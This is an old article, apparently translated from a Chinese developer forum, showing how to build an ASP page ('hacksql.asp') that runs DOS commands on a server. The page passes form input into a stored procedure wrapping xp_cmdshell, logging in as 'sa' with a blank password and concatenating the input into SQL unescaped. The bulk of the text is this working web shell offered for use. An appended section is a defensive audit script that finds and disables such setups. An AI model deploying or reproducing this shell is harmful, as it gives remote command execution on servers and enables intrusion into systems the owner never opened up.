An ASP program that runs DOS commands through a SQL stored procedure
Author: ddydy  Published: 2005-03-12  Source: 开发者俱乐部
1. First, create a stored procedure in a database on the SQL server that you are able to access, for example one named ddy, as follows:

    CREATE PROCEDURE ddy @cmd varchar(50) AS
    exec master..xp_cmdshell @cmd

2. The ASP program is as follows (hacksql.asp):

    <%
    cmd=trim(Request.Form("cmd"))
    if cmd<>"" then
        work()
    else
        show()
    end if

    function work()
        set conn=server.CreateObject("adodb.connection")
        set rs=server.CreateObject("adodb.recordset")
        ' DSN "xx", login "sa" with a blank password
        conn.Open "xx","sa",""
        sql="exec ddy '"&cmd&"'"
        rs.Open sql,conn
        if not rs.EOF then
            do while not rs.eof
                Response.Write "<pre>"&htmlencode2(trim(rs(0)))&"</pre>"
                rs.MoveNext
            loop
        else
            Response.Write "no"
        end if
        if rs.State=1 then rs.close
        set rs=nothing
        conn.Close
        set conn=nothing
    end function

    function show()
    %>
    <form action=hacksql.asp method=post>
    请输入DOS命令:<input type=text name=cmd>
    <input type=submit value="ok">
    </form>
    <%
    end function

    function htmlencode2(str) '-------- conversion function (so the output displays neatly)
        dim result
        dim l
        if isnull(str) then
            htmlencode2=""
            exit function
        end if
        l=len(str)
        result=""
        dim i
        for i = 1 to l
            select case mid(str,i,1)
                case "<"
                    result=result+"&lt;"
                case ">"
                    result=result+"&gt;"
                case chr(34)
                    result=result+"&quot;"
                case "&"
                    result=result+"&amp;"
                case chr(13)
                    result=result+"<br>"
                case chr(9)
                    ' tab -> non-breaking spaces (the original count is not recoverable from the page; four assumed)
                    result=result+"&nbsp;&nbsp;&nbsp;&nbsp;"
                case "'"
                    result=result+"’"
                case chr(32)
                    ' keep runs of whitespace visible; a single space between words stays a plain space
                    if i+1<=l and i-1>0 then
                        if mid(str,i+1,1)=chr(32) or mid(str,i+1,1)=chr(9) or mid(str,i-1,1)=chr(32) or mid(str,i-1,1)=chr(9) then
                            result=result+"&nbsp;"
                        else
                            result=result+" "
                        end if
                    else
                        result=result+"&nbsp;"
                    end if
                case else
                    result=result+mid(str,i,1)
            end select
        next
        htmlencode2=result
    end function
    %>
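An audit that a SQL Server administrator can run to find the setup this page depends on: xp_cmdshell enabled, a user procedure wrapping it, and a login with a blank password. This is an added example, not part of the original article; it assumes SQL Server 2008 or later and a sysadmin session.

```sql
-- Added audit example: run as sysadmin on SQL Server 2008 or later.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means any sysadmin
--    (or proxy-account user) can run OS commands through it.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Modules in the current database that wrap xp_cmdshell, like the
--    page's "ddy" procedure. Run in every database; modules created
--    WITH ENCRYPTION have a NULL definition and need manual review.
SELECT DB_NAME()                       AS database_name,
       OBJECT_SCHEMA_NAME(m.object_id) AS schema_name,
       o.name                          AS object_name,
       o.type_desc, o.create_date, o.modify_date
FROM sys.sql_modules AS m
JOIN sys.objects     AS o ON o.object_id = m.object_id
WHERE LOWER(m.definition) LIKE '%xp[_]cmdshell%'
   OR m.definition IS NULL;

-- 3. SQL logins whose password is blank, as "sa" is in the page's
--    connection string.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- 4. Logins in the sysadmin role; a web application's login should
--    not be among them.
SELECT m.name AS login_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 5. If nothing legitimate depends on it, turn xp_cmdshell off.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```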